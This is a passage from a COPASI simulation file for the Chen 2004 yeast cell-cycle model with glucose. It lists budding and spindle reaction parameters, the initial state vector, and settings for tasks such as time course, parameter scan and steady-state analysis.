<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Budding],ParameterGroup=Parameters,Parameter=ebudn2" value="0.25" type="ReactionParameter" simulationType="assignment">
<InitialExpression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[ebudn2],Reference=InitialValue>
</InitialExpression>
</ModelParameter>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Budding],ParameterGroup=Parameters,Parameter=ebudn3" value="0.05" type="ReactionParameter" simulationType="assignment">
<InitialExpression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[ebudn3],Reference=InitialValue>
</InitialExpression>
</ModelParameter>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Budding],ParameterGroup=Parameters,Parameter=ksbud" value="0.2" type="ReactionParameter" simulationType="assignment">
<InitialExpression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[ksbud],Reference=InitialValue>
</InitialExpression>
</ModelParameter>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Negative regulation of Cell budding]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Negative regulation of Cell budding],ParameterGroup=Parameters,Parameter=kdbud" value="0.06" type="ReactionParameter" simulationType="assignment">
<InitialExpression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kdbud],Reference=InitialValue>
</InitialExpression>
</ModelParameter>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Spindle formation]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Spindle formation],ParameterGroup=Parameters,Parameter=Jspn" value="0.14" type="ReactionParameter" simulationType="assignment">
<InitialExpression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[Jspn],Reference=InitialValue>
</InitialExpression>
</ModelParameter>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Spindle formation],ParameterGroup=Parameters,Parameter=ksspn" value="0.1" type="ReactionParameter" simulationType="assignment">
<InitialExpression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[ksspn],Reference=InitialValue>
</InitialExpression>
</ModelParameter>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Spindle disassembly]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Spindle disassembly],ParameterGroup=Parameters,Parameter=kdspn" value="0.06" type="ReactionParameter" simulationType="assignment">
<InitialExpression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kdspn],Reference=InitialValue>
</InitialExpression>
</ModelParameter>
</ModelParameterGroup>
</ModelParameterGroup>
</ModelParameterSet>
</ListOfModelParameterSets>
<StateTemplate>
<StateTemplateVariable objectReference="Model_7"/>
<StateTemplateVariable objectReference="ModelValue_178"/>
<StateTemplateVariable objectReference="Metabolite_77"/>
<StateTemplateVariable objectReference="Metabolite_143"/>
<StateTemplateVariable objectReference="Metabolite_21"/>
<StateTemplateVariable objectReference="Metabolite_89"/>
<StateTemplateVariable objectReference="Metabolite_93"/>
<StateTemplateVariable objectReference="Metabolite_123"/>
<StateTemplateVariable objectReference="Metabolite_139"/>
<StateTemplateVariable objectReference="Metabolite_79"/>
<StateTemplateVariable objectReference="Metabolite_145"/>
<StateTemplateVariable objectReference="Metabolite_83"/>
<StateTemplateVariable objectReference="Metabolite_131"/>
<StateTemplateVariable objectReference="Metabolite_1"/>
<StateTemplateVariable objectReference="Metabolite_151"/>
<StateTemplateVariable objectReference="Metabolite_125"/>
<StateTemplateVariable objectReference="Metabolite_105"/>
<StateTemplateVariable objectReference="Metabolite_25"/>
<StateTemplateVariable objectReference="Metabolite_109"/>
<StateTemplateVariable objectReference="Metabolite_33"/>
<StateTemplateVariable objectReference="Metabolite_107"/>
<StateTemplateVariable objectReference="Metabolite_37"/>
<StateTemplateVariable objectReference="Metabolite_113"/>
<StateTemplateVariable objectReference="Metabolite_129"/>
<StateTemplateVariable objectReference="Metabolite_135"/>
<StateTemplateVariable objectReference="Metabolite_13"/>
<StateTemplateVariable objectReference="Metabolite_97"/>
<StateTemplateVariable objectReference="Metabolite_41"/>
<StateTemplateVariable objectReference="Metabolite_149"/>
<StateTemplateVariable objectReference="Metabolite_157"/>
<StateTemplateVariable objectReference="Metabolite_101"/>
<StateTemplateVariable objectReference="Metabolite_5"/>
<StateTemplateVariable objectReference="Metabolite_85"/>
<StateTemplateVariable objectReference="Metabolite_153"/>
<StateTemplateVariable objectReference="Metabolite_137"/>
<StateTemplateVariable objectReference="Metabolite_103"/>
<StateTemplateVariable objectReference="Metabolite_29"/>
<StateTemplateVariable objectReference="Metabolite_119"/>
<StateTemplateVariable objectReference="Metabolite_49"/>
<StateTemplateVariable objectReference="Metabolite_9"/>
<StateTemplateVariable objectReference="Metabolite_99"/>
<StateTemplateVariable objectReference="Metabolite_111"/>
<StateTemplateVariable objectReference="Metabolite_121"/>
<StateTemplateVariable objectReference="Metabolite_133"/>
<StateTemplateVariable objectReference="Metabolite_141"/>
<StateTemplateVariable objectReference="Metabolite_155"/>
<StateTemplateVariable objectReference="ModelValue_154"/>
<StateTemplateVariable objectReference="ModelValue_155"/>
<StateTemplateVariable objectReference="ModelValue_156"/>
<StateTemplateVariable objectReference="ModelValue_157"/>
<StateTemplateVariable objectReference="ModelValue_158"/>
<StateTemplateVariable objectReference="ModelValue_159"/>
<StateTemplateVariable objectReference="ModelValue_160"/>
<StateTemplateVariable objectReference="ModelValue_161"/>
<StateTemplateVariable objectReference="ModelValue_162"/>
<StateTemplateVariable objectReference="ModelValue_163"/>
<StateTemplateVariable objectReference="ModelValue_164"/>
<StateTemplateVariable objectReference="ModelValue_165"/>
<StateTemplateVariable objectReference="ModelValue_166"/>
<StateTemplateVariable objectReference="ModelValue_167"/>
<StateTemplateVariable objectReference="ModelValue_168"/>
<StateTemplateVariable objectReference="ModelValue_169"/>
<StateTemplateVariable objectReference="ModelValue_170"/>
<StateTemplateVariable objectReference="Metabolite_17"/>
<StateTemplateVariable objectReference="Metabolite_81"/>
<StateTemplateVariable objectReference="Metabolite_87"/>
<StateTemplateVariable objectReference="Metabolite_91"/>
<StateTemplateVariable objectReference="Metabolite_95"/>
<StateTemplateVariable objectReference="Metabolite_127"/>
<StateTemplateVariable objectReference="Metabolite_147"/>
<StateTemplateVariable objectReference="ModelValue_150"/>
<StateTemplateVariable objectReference="ModelValue_152"/>
<StateTemplateVariable objectReference="ModelValue_153"/>
<StateTemplateVariable objectReference="ModelValue_171"/>
<StateTemplateVariable objectReference="Metabolite_159"/>
<StateTemplateVariable objectReference="Metabolite_45"/>
<StateTemplateVariable objectReference="Metabolite_115"/>
<StateTemplateVariable objectReference="Metabolite_117"/>
<StateTemplateVariable objectReference="Compartment_3"/>
<StateTemplateVariable objectReference="ModelValue_6"/>
<StateTemplateVariable objectReference="ModelValue_5"/>
<StateTemplateVariable objectReference="ModelValue_11"/>
<StateTemplateVariable objectReference="ModelValue_12"/>
<StateTemplateVariable objectReference="ModelValue_13"/>
<StateTemplateVariable objectReference="ModelValue_14"/>
<StateTemplateVariable objectReference="ModelValue_15"/>
<StateTemplateVariable objectReference="ModelValue_16"/>
<StateTemplateVariable objectReference="ModelValue_17"/>
<StateTemplateVariable objectReference="ModelValue_18"/>
<StateTemplateVariable objectReference="ModelValue_19"/>
<StateTemplateVariable objectReference="ModelValue_20"/>
<StateTemplateVariable objectReference="ModelValue_21"/>
<StateTemplateVariable objectReference="ModelValue_22"/>
<StateTemplateVariable objectReference="ModelValue_23"/>
<StateTemplateVariable objectReference="ModelValue_24"/>
<StateTemplateVariable objectReference="ModelValue_25"/>
<StateTemplateVariable objectReference="ModelValue_26"/>
<StateTemplateVariable objectReference="ModelValue_27"/>
<StateTemplateVariable objectReference="ModelValue_28"/>
<StateTemplateVariable objectReference="ModelValue_29"/>
<StateTemplateVariable objectReference="ModelValue_30"/>
<StateTemplateVariable objectReference="ModelValue_31"/>
<StateTemplateVariable objectReference="ModelValue_32"/>
<StateTemplateVariable objectReference="ModelValue_33"/>
<StateTemplateVariable objectReference="ModelValue_34"/>
<StateTemplateVariable objectReference="ModelValue_35"/>
<StateTemplateVariable objectReference="ModelValue_36"/>
<StateTemplateVariable objectReference="ModelValue_37"/>
<StateTemplateVariable objectReference="ModelValue_38"/>
<StateTemplateVariable objectReference="ModelValue_39"/>
<StateTemplateVariable objectReference="ModelValue_40"/>
<StateTemplateVariable objectReference="ModelValue_41"/>
<StateTemplateVariable objectReference="ModelValue_42"/>
<StateTemplateVariable objectReference="ModelValue_43"/>
<StateTemplateVariable objectReference="ModelValue_44"/>
<StateTemplateVariable objectReference="ModelValue_45"/>
<StateTemplateVariable objectReference="ModelValue_46"/>
<StateTemplateVariable objectReference="ModelValue_47"/>
<StateTemplateVariable objectReference="ModelValue_48"/>
<StateTemplateVariable objectReference="ModelValue_49"/>
<StateTemplateVariable objectReference="ModelValue_50"/>
<StateTemplateVariable objectReference="ModelValue_51"/>
<StateTemplateVariable objectReference="ModelValue_52"/>
<StateTemplateVariable objectReference="ModelValue_53"/>
<StateTemplateVariable objectReference="ModelValue_54"/>
<StateTemplateVariable objectReference="ModelValue_55"/>
<StateTemplateVariable objectReference="ModelValue_56"/>
<StateTemplateVariable objectReference="ModelValue_57"/>
<StateTemplateVariable objectReference="ModelValue_58"/>
<StateTemplateVariable objectReference="ModelValue_59"/>
<StateTemplateVariable objectReference="ModelValue_60"/>
<StateTemplateVariable objectReference="ModelValue_61"/>
<StateTemplateVariable objectReference="ModelValue_62"/>
<StateTemplateVariable objectReference="ModelValue_63"/>
<StateTemplateVariable objectReference="ModelValue_64"/>
<StateTemplateVariable objectReference="ModelValue_65"/>
<StateTemplateVariable objectReference="ModelValue_66"/>
<StateTemplateVariable objectReference="ModelValue_67"/>
<StateTemplateVariable objectReference="ModelValue_68"/>
<StateTemplateVariable objectReference="ModelValue_69"/>
<StateTemplateVariable objectReference="ModelValue_70"/>
<StateTemplateVariable objectReference="ModelValue_71"/>
<StateTemplateVariable objectReference="ModelValue_72"/>
<StateTemplateVariable objectReference="ModelValue_73"/>
<StateTemplateVariable objectReference="ModelValue_74"/>
<StateTemplateVariable objectReference="ModelValue_75"/>
<StateTemplateVariable objectReference="ModelValue_76"/>
<StateTemplateVariable objectReference="ModelValue_77"/>
<StateTemplateVariable objectReference="ModelValue_78"/>
<StateTemplateVariable objectReference="ModelValue_79"/>
<StateTemplateVariable objectReference="ModelValue_80"/>
<StateTemplateVariable objectReference="ModelValue_81"/>
<StateTemplateVariable objectReference="ModelValue_82"/>
<StateTemplateVariable objectReference="ModelValue_83"/>
<StateTemplateVariable objectReference="ModelValue_84"/>
<StateTemplateVariable objectReference="ModelValue_85"/>
<StateTemplateVariable objectReference="ModelValue_86"/>
<StateTemplateVariable objectReference="ModelValue_87"/>
<StateTemplateVariable objectReference="ModelValue_88"/>
<StateTemplateVariable objectReference="ModelValue_89"/>
<StateTemplateVariable objectReference="ModelValue_90"/>
<StateTemplateVariable objectReference="ModelValue_91"/>
<StateTemplateVariable objectReference="ModelValue_92"/>
<StateTemplateVariable objectReference="ModelValue_93"/>
<StateTemplateVariable objectReference="ModelValue_94"/>
<StateTemplateVariable objectReference="ModelValue_95"/>
<StateTemplateVariable objectReference="ModelValue_96"/>
<StateTemplateVariable objectReference="ModelValue_97"/>
<StateTemplateVariable objectReference="ModelValue_98"/>
<StateTemplateVariable objectReference="ModelValue_99"/>
<StateTemplateVariable objectReference="ModelValue_100"/>
<StateTemplateVariable objectReference="ModelValue_101"/>
<StateTemplateVariable objectReference="ModelValue_102"/>
<StateTemplateVariable objectReference="ModelValue_103"/>
<StateTemplateVariable objectReference="ModelValue_104"/>
<StateTemplateVariable objectReference="ModelValue_105"/>
<StateTemplateVariable objectReference="ModelValue_106"/>
<StateTemplateVariable objectReference="ModelValue_107"/>
<StateTemplateVariable objectReference="ModelValue_108"/>
<StateTemplateVariable objectReference="ModelValue_109"/>
<StateTemplateVariable objectReference="ModelValue_110"/>
<StateTemplateVariable objectReference="ModelValue_111"/>
<StateTemplateVariable objectReference="ModelValue_112"/>
<StateTemplateVariable objectReference="ModelValue_113"/>
<StateTemplateVariable objectReference="ModelValue_114"/>
<StateTemplateVariable objectReference="ModelValue_115"/>
<StateTemplateVariable objectReference="ModelValue_116"/>
<StateTemplateVariable objectReference="ModelValue_117"/>
<StateTemplateVariable objectReference="ModelValue_118"/>
<StateTemplateVariable objectReference="ModelValue_119"/>
<StateTemplateVariable objectReference="ModelValue_120"/>
<StateTemplateVariable objectReference="ModelValue_121"/>
<StateTemplateVariable objectReference="ModelValue_122"/>
<StateTemplateVariable objectReference="ModelValue_123"/>
<StateTemplateVariable objectReference="ModelValue_124"/>
<StateTemplateVariable objectReference="ModelValue_125"/>
<StateTemplateVariable objectReference="ModelValue_126"/>
<StateTemplateVariable objectReference="ModelValue_127"/>
<StateTemplateVariable objectReference="ModelValue_128"/>
<StateTemplateVariable objectReference="ModelValue_129"/>
<StateTemplateVariable objectReference="ModelValue_130"/>
<StateTemplateVariable objectReference="ModelValue_131"/>
<StateTemplateVariable objectReference="ModelValue_132"/>
<StateTemplateVariable objectReference="ModelValue_133"/>
<StateTemplateVariable objectReference="ModelValue_134"/>
<StateTemplateVariable objectReference="ModelValue_135"/>
<StateTemplateVariable objectReference="ModelValue_136"/>
<StateTemplateVariable objectReference="ModelValue_137"/>
<StateTemplateVariable objectReference="ModelValue_138"/>
<StateTemplateVariable objectReference="ModelValue_139"/>
<StateTemplateVariable objectReference="ModelValue_140"/>
<StateTemplateVariable objectReference="ModelValue_141"/>
<StateTemplateVariable objectReference="ModelValue_142"/>
<StateTemplateVariable objectReference="ModelValue_143"/>
<StateTemplateVariable objectReference="ModelValue_144"/>
<StateTemplateVariable objectReference="ModelValue_145"/>
<StateTemplateVariable objectReference="ModelValue_146"/>
<StateTemplateVariable objectReference="ModelValue_147"/>
<StateTemplateVariable objectReference="ModelValue_148"/>
<StateTemplateVariable objectReference="ModelValue_149"/>
<StateTemplateVariable objectReference="ModelValue_151"/>
<StateTemplateVariable objectReference="ModelValue_172"/>
<StateTemplateVariable objectReference="ModelValue_173"/>
<StateTemplateVariable objectReference="ModelValue_174"/>
<StateTemplateVariable objectReference="ModelValue_175"/>
<StateTemplateVariable objectReference="ModelValue_176"/>
<StateTemplateVariable objectReference="ModelValue_177"/>
<StateTemplateVariable objectReference="ModelValue_179"/>
</StateTemplate>
<InitialState type="initialState">
0 0 1.747366772326145e+23 6.153793596801723e+22 1.80535936470497e+23 9.253339255958898e+21 3.888445993186847e+21 2.019185755329673e+22 1.964083420555222e+23 6.987702526155101e+21 3.151195626929545e+21 6.004823451606606e+23 1.093220582617615e+22 6.649934635684339e+23 5.446744061809811e+23 6.421153989171979e+23 5.07527926009403e+21 2.307420732690804e+21 2.417387190365045e+18 5.428453477226389e+21 6.000645303884879e+19 1.415750029349604e+23 2.196294727685002e+22 5.793351133464459e+22 7.235672544851775e+22 3.817302580975654e+23 2.879579509269514e+22 9.000829013319018e+21 3.305249612645038e+22 4.758414978992805e+23 2.159777877052535e+23 2.29204033134851e+23 1.731804839342613e+21 7.393161906544548e+21 8.274840214739905e+23 1.056512290096014e+23 6.3287734055348e+22 5.128887707846334e+23 2.769598672382914e+22 2.204838369841239e+23 2.994239436853977e+22 5.802510581936991e+23 6.177542491684398e+21 3.86236266090673e+23 7.496739071384451e+21 1.263726206237145e+23 0.07089635273693944 0.4589400389952509 0.4049487568106332 0.7229242355857484 0.0623561288838139 0.06275343987480581 0.2498295509602317 0.009132056237052346 0.410453463847625 0.3324302671175433 0.8999351532761247 0.1260054117516113 0.001536552944821854 0.02672503275178556 0.02826158569660742 1.199147754801158 1.199147754801158 1.20442800000001e+24 2.925132390092359e+23 5.698007708108632e+23 2.669832374374183e+23 6.954600729887336e+22 1.686199200000007e+24 2.772876737281114e+23 104.9622855759751 123.3657116717321 0.0066037736960122 0.4427813303603884 1.204428357999999e+21 1.204428300000005e+23 6.022141500000027e+22 6.022141499999998e+21 1 0.054 1 0.2 0.4 1 1 1 0.25 0.05 0.45 0.1 0.03 0.06 0.3 0.55 0.1 0.03 0.06 0.3 1.2 8 0.4 0.25 0.45 0.9 2 2 10 1 1 0.15 0.03 0.1 0.1 0.01 0.1 0.05 0.05 0.03 0.1 0.1 0.01 0.1 6 0.04 0.14 0.002 1 0.001 0.05 0.2 0.01 0.8 0.1 1 50 50 0.38 50 15 0.01 200 1 2 0.1 0.01 0.01 0.01 0.3 1 1 0.2 1 1 0.04 0.003 0.4 0.15 0.01 0.16 0.06 0.01 0.05 0.06 0.5 0.5 0.01 1 2 0.12 0.03 0.06 0.17 2 0.06 0.08 0.3 0.2 0.5 0.001 0.08 0.15 0.15 0.6 8 0.05 0.01 0.6 4 4 0.05 3 0.2 0.03 0.006 0.6 0.055 0.001 0.04 0.0008 0.005 0.2 0.012 0.12 0.01 0.024 0.12 0.004 0 0.15 0.08400000000000001 2 0 0.1 0.1 0.005 0.08 1 0.1 8 0.01 1 6.0221415e+23 -1 0.007 0 0 0.00012 0
</InitialState>
</Model>
<ListOfTasks>
<Task key="Task_27" name="Steady-State" type="steadyState" scheduled="false" updateModel="false">
<Report reference="Report_20" target="" append="1" confirmOverwrite="0"/>
<Problem>
<Parameter name="JacobianRequested" type="bool" value="1"/>
<Parameter name="StabilityAnalysisRequested" type="bool" value="1"/>
</Problem>
<Method name="Enhanced Newton" type="EnhancedNewton">
<Parameter name="Resolution" type="unsignedFloat" value="1e-09"/>
<Parameter name="Derivation Factor" type="unsignedFloat" value="0.001"/>
<Parameter name="Use Newton" type="bool" value="1"/>
<Parameter name="Use Integration" type="bool" value="1"/>
<Parameter name="Use Back Integration" type="bool" value="1"/>
<Parameter name="Accept Negative Concentrations" type="bool" value="0"/>
<Parameter name="Iteration Limit" type="unsignedInteger" value="50"/>
<Parameter name="Maximum duration for forward integration" type="unsignedFloat" value="1000000000"/>
<Parameter name="Maximum duration for backward integration" type="unsignedFloat" value="1000000"/>
</Method>
</Task>
<Task key="Task_15" name="Time-Course" type="timeCourse" scheduled="true" updateModel="false">
<Report reference="Report_15" target="EventTest12.1.txt" append="0" confirmOverwrite="0"/>
<Problem>
<Parameter name="StepNumber" type="unsignedInteger" value="2"/>
<Parameter name="StepSize" type="float" value="200"/>
<Parameter name="Duration" type="float" value="400"/>
<Parameter name="TimeSeriesRequested" type="bool" value="1"/>
<Parameter name="OutputStartTime" type="float" value="0"/>
<Parameter name="Output Event" type="bool" value="1"/>
<Parameter name="Continue on Simultaneous Events" type="bool" value="0"/>
</Problem>
<Method name="Deterministic (LSODA)" type="Deterministic(LSODA)">
<Parameter name="Integrate Reduced Model" type="bool" value="0"/>
<Parameter name="Relative Tolerance" type="unsignedFloat" value="1e-07"/>
<Parameter name="Absolute Tolerance" type="unsignedFloat" value="1e-12"/>
<Parameter name="Max Internal Steps" type="unsignedInteger" value="10000"/>
</Method>
</Task>
<Task key="Task_16" name="Scan" type="scan" scheduled="false" updateModel="false">
<Problem>
<Parameter name="Subtask" type="unsignedInteger" value="1"/>
<ParameterGroup name="ScanItems">
<ParameterGroup name="ScanItem">
<Parameter name="Maximum" type="float" value="0.01"/>
<Parameter name="Minimum" type="float" value="0.0004"/>
<Parameter name="Number of steps" type="unsignedInteger" value="15"/>
<Parameter name="Object" type="cn" value="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[GLU],Reference=InitialConcentration"/>
<Parameter name="Type" type="unsignedInteger" value="1"/>
<Parameter name="log" type="bool" value="1"/>
</ParameterGroup>
</ParameterGroup>
<Parameter name="Output in subtask" type="bool" value="0"/>
<Parameter name="Adjust initial conditions" type="bool" value="0"/>
</Problem>
<Method name="Scan Framework" type="ScanFramework">
</Method>
</Task>
<Task key="Task_17" name="Elementary Flux Modes" type="fluxMode" scheduled="false" updateModel="false">
<Report reference="Report_19" target="" append="1" confirmOverwrite="0"/>
<Problem>
</Problem>
<Method name="Bit Pattern Tree Algorithm" type="EFMBitPatternTreeMethod">
</Method>
</Task>
<Task key="Task_18" name="Optimization" type="optimization" scheduled="false" updateModel="false">
<Report reference="Report_9" target="" append="1" confirmOverwrite="0"/>
<Problem>
<Parameter name="Subtask" type="cn" value="CN=Root,Vector=TaskList[Steady-State]"/>
<ParameterText name="ObjectiveExpression" type="expression">
</ParameterText>
<Parameter name="Maximize" type="bool" value="0"/>
<Parameter name="Randomize Start Values" type="bool" value="0"/>
<Parameter name="Calculate Statistics" type="bool" value="1"/>
<ParameterGroup name="OptimizationItemList">
</ParameterGroup>
<ParameterGroup name="OptimizationConstraintList">
</ParameterGroup>
</Problem>
<Method name="Random Search" type="RandomSearch">
<Parameter name="Number of Iterations" type="unsignedInteger" value="100000"/>
<Parameter name="Random Number Generator" type="unsignedInteger" value="1"/>
<Parameter name="Seed" type="unsignedInteger" value="0"/>
</Method>
</Task>
<Task key="Task_19" name="Parameter Estimation" type="parameterFitting" scheduled="false" updateModel="false">
<Report reference="Report_10" target="" append="1" confirmOverwrite="0"/>
<Problem>
<Parameter name="Maximize" type="bool" value="0"/>
<Parameter name="Randomize Start Values" type="bool" value="0"/>
<Parameter name="Calculate Statistics" type="bool" value="1"/>
<ParameterGroup name="OptimizationItemList">
</ParameterGroup>
<ParameterGroup name="OptimizationConstraintList">
</ParameterGroup>
<Parameter name="Steady-State" type="cn" value="CN=Root,Vector=TaskList[Steady-State]"/>
<Parameter name="Time-Course" type="cn" value="CN=Root,Vector=TaskList[Time-Course]"/>
<Parameter name="Create Parameter Sets" type="bool" value="0"/>
<ParameterGroup name="Experiment Set">
</ParameterGroup>
<ParameterGroup name="Validation Set">
<Parameter name="Threshold" type="unsignedInteger" value="5"/>
<Parameter name="Weight" type="unsignedFloat" value="1"/>
</ParameterGroup>
</Problem>
<Method name="Evolutionary Programming" type="EvolutionaryProgram">
<Parameter name="Number of Generations" type="unsignedInteger" value="200"/>
<Parameter name="Population Size" type="unsignedInteger" value="20"/>
<Parameter name="Random Number Generator" type="unsignedInteger" value="1"/>
<Parameter name="Seed" type="unsignedInteger" value="0"/>
</Method>
</Task>
<Task key="Task_20" name="Metabolic Control Analysis" type="metabolicControlAnalysis" scheduled="false" updateModel="false">
<Report reference="Report_11" target="" append="1" confirmOverwrite="0"/>
<Problem>
<Parameter name="Steady-State" type="key" value=""/>
</Problem>
<Method name="MCA Method (Reder)" type="MCAMethod(Reder)">
<Parameter name="Modulation Factor" type="unsignedFloat" value="1e-09"/>
</Method>
</Task>
<Task key="Task_21" name="Lyapunov Exponents" type="lyapunovExponents" scheduled="false" updateModel="false">
<Report reference="Report_12" target="" append="1" confirmOverwrite="0"/>
<Problem>
<Parameter name="ExponentNumber" type="unsignedInteger" value="3"/>
<Parameter name="DivergenceRequested" type="bool" value="1"/>
<Parameter name="TransientTime" type="float" value="0"/>
</Problem>
<Method name="Wolf Method" type="WolfMethod">
<Parameter name="Orthonormalization Interval" type="unsignedFloat" value="1"/>
<Parameter name="Overall time" type="unsignedFloat" value="1000"/>
<Parameter name="Relative Tolerance" type="unsignedFloat" value="1e-06"/>
<Parameter name="Absolute Tolerance" type="unsignedFloat" value="1e-12"/>
<Parameter name="Max Internal Steps" type="unsignedInteger" value="10000"/>
</Method>
</Task>
<Task key="Task_22" name="Time Scale Separation Analysis" type="timeScaleSeparationAnalysis" scheduled="false" updateModel="false">
<Report reference="Report_13" target="" append="1" confirmOverwrite="0"/>
<Problem>
<Parameter name="StepNumber" type="unsignedInteger" value="100"/>
<Parameter name="StepSize" type="float" value="0.01"/>
<Parameter name="Duration" type="float" value="1"/>
<Parameter name="TimeSeriesRequested" type="bool" value="1"/>
<Parameter name="OutputStartTime" type="float" value="0"/>
</Problem>
<Method name="ILDM (LSODA,Deuflhard)" type="TimeScaleSeparation(ILDM,Deuflhard)">
<Parameter name="Deuflhard Tolerance" type="unsignedFloat" value="1e-06"/>
</Method>
</Task>
<Task key="Task_23" name="Sensitivities" type="sensitivities" scheduled="false" updateModel="false">
<Report reference="Report_14" target="" append="1" confirmOverwrite="0"/>
<Problem>
<Parameter name="SubtaskType" type="unsignedInteger" value="1"/>
<ParameterGroup name="TargetFunctions">
<Parameter name="SingleObject" type="cn" value=""/>
<Parameter name="ObjectListType" type="unsignedInteger" value="7"/>
</ParameterGroup>
<ParameterGroup name="ListOfVariables">
<ParameterGroup name="Variables">
<Parameter name="SingleObject" type="cn" value=""/>
<Parameter name="ObjectListType" type="unsignedInteger" value="41"/>
</ParameterGroup>
</ParameterGroup>
</Problem>
<Method name="Sensitivities Method" type="SensitivitiesMethod">
<Parameter name="Delta factor" type="unsignedFloat" value="0.001"/>
<Parameter name="Delta minimum" type="unsignedFloat" value="1e-12"/>
</Method>
</Task>
<Task key="Task_24" name="Moieties" type="moieties" scheduled="false" updateModel="false">
<Problem>
</Problem>
<Method name="Householder Reduction" type="Householder">
</Method>
</Task>
<Task key="Task_25" name="Cross Section" type="crosssection" scheduled="false" updateModel="false">
<Problem>
<Parameter name="StepNumber" type="unsignedInteger" value="100"/>
<Parameter name="StepSize" type="float" value="0.01"/>
<Parameter name="Duration" type="float" value="1"/>
<Parameter name="TimeSeriesRequested" type="bool" value="1"/>
<Parameter name="OutputStartTime" type="float" value="0"/>
<Parameter name="Output Event" type="bool" value="0"/>
<Parameter name="Continue on Simultaneous Events" type="bool" value="0"/>
<Parameter name="LimitCrossings" type="bool" value="0"/>
<Parameter name="NumCrossingsLimit" type="unsignedInteger" value="0"/>
<Parameter name="LimitOutTime" type="bool" value="0"/>
<Parameter name="LimitOutCrossings" type="bool" value="0"/>
<Parameter name="PositiveDirection" type="bool" value="1"/>
<Parameter name="NumOutCrossingsLimit" type="unsignedInteger" value="0"/>
<Parameter name="LimitUntilConvergence" type="bool" value="0"/>
<Parameter name="ConvergenceTolerance" type="float" value="1e-06"/>
<Parameter name="Threshold" type="float" value="0"/>
<Parameter name="DelayOutputUntilConvergence" type="bool" value="0"/>
<Parameter name="OutputConvergenceTolerance" type="float" value="1e-06"/>
<ParameterText name="TriggerExpression" type="expression">
</ParameterText>
<Parameter name="SingleVariable" type="cn" value=""/>
<Parameter name="LimitTime" type="bool" value="1"/>
</Problem>
<Method name="Deterministic (LSODA)" type="Deterministic(LSODA)">
<Parameter name="Integrate Reduced Model" type="bool" value="0"/>
<Parameter name="Relative Tolerance" type="unsignedFloat" value="1e-06"/>
<Parameter name="Absolute Tolerance" type="unsignedFloat" value="1e-12"/>
<Parameter name="Max Internal Steps" type="unsignedInteger" value="10000"/>
</Method>
</Task>
<Task key="Task_14" name="Linear Noise Approximation" type="linearNoiseApproximation" scheduled="false" updateModel="false">
<Report reference="Report_16" target="" append="1" confirmOverwrite="1"/>
<Problem>
<Parameter name="Steady-State" type="key" value="Task_27"/>
</Problem>
<Method name="Linear Noise Approximation" type="LinearNoiseApproximation">
</Method>
</Task>
</ListOfTasks>
<ListOfReports>
<Report key="Report_20" name="Steady-State" taskType="steadyState" separator="	" precision="6">
<Comment>
<body xmlns="http://www.w3.org/1999/xhtml">
Automatically generated report.
</body>
</Comment>
<Footer>
<Object cn="CN=Root,Vector=TaskList[Steady-State]"/>
</Footer>
</Report>
<Report key="Report_19" name="Elementary Flux Modes" taskType="fluxMode" separator="	" precision="6">
<Comment>
<body xmlns="http://www.w3.org/1999/xhtml">
Automatically generated report.
</body>
</Comment>
<Footer>
<Object cn="CN=Root,Vector=TaskList[Elementary Flux Modes],Object=Result"/>
</Footer>
</Report>
<Report key="Report_9" name="Optimization" taskType="optimization" separator="	" precision="6">
<Comment>
<body xmlns="http://www.w3.org/1999/xhtml">
Automatically generated report.
</body>
</Comment>
<Header>
<Object cn="CN=Root,Vector=TaskList[Optimization],Object=Description"/>
<Object cn="String=\[Function Evaluations\]"/>
<Object cn="Separator=	"/>
<Object cn="String=\[Best Value\]"/>
<Object cn="Separator=	"/>
<Object cn="String=\[Best Parameters\]"/>
</Header>
<Body>
<Object cn="CN=Root,Vector=TaskList[Optimization],Problem=Optimization,Reference=Function Evaluations"/>
<Object cn="Separator=	"/>
<Object cn="CN=Root,Vector=TaskList[Optimization],Problem=Optimization,Reference=Best Value"/>
<Object cn="Separator=	"/>
<Object cn="CN=Root,Vector=TaskList[Optimization],Problem=Optimization,Reference=Best Parameters"/>
</Body>
<Footer>
<Object cn="String=
"/>
<Object cn="CN=Root,Vector=TaskList[Optimization],Object=Result"/>
</Footer>
</Report>
<Report key="Report_10" name="Parameter Estimation" taskType="parameterFitting" separator="	" precision="6">
<Comment>
<body xmlns="http://www.w3.org/1999/xhtml">
Automatically generated report.
</body>
</Comment>
<Header>
<Object cn="CN=Root,Vector=TaskList[Parameter Estimation],Object=Description"/>
<Object cn="String=\[Function Evaluations\]"/>
<Object cn="Separator=	"/>
<Object cn="String=\[Best Value\]"/>
<Object cn="Separator=	"/>
<Object cn="String=\[Best Parameters\]"/>
</Header>
<Body>
<Object cn="CN=Root,Vector=TaskList[Parameter Estimation],Problem=Parameter Estimation,Reference=Function Evaluations"/>
<Object cn="Separator=	"/>
<Object cn="CN=Root,Vector=TaskList[Parameter Estimation],Problem=Parameter Estimation,Reference=Best Value"/>
<Object cn="Separator=	"/>
